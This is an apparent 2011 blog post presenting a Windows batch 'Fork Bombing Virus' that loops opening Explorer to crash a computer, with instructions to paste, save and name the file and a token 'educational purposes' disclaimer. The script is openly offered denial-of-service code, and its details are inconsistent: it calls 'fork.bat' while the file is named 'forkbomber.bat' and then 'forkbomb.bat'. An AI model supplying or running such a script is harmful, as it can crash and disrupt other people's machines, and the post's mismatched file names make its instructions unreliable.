Tuesday, September 13, 2011

Fork Bombing Virus

Posted by Patel Gopal On 12:05 AM 0 comments

There is a virus called Fork Bombing Virus which opens Explorer many times.

It has a infinite loop and opens infinite times explorer which will crash your system.
Copy the below program and paste it in a notepad file and save it as ‘forkbomber.bat’

Code of Virus :

@echo off
:loop
Explorer
Call fork.bat
Goto loop

Save it as "forkbomb.bat"

Warning: Don't open it in your own system it may harm your or crush your system. I am not responsible for any damage. Use it for only educational purposes. 

0 comments:

Post a Comment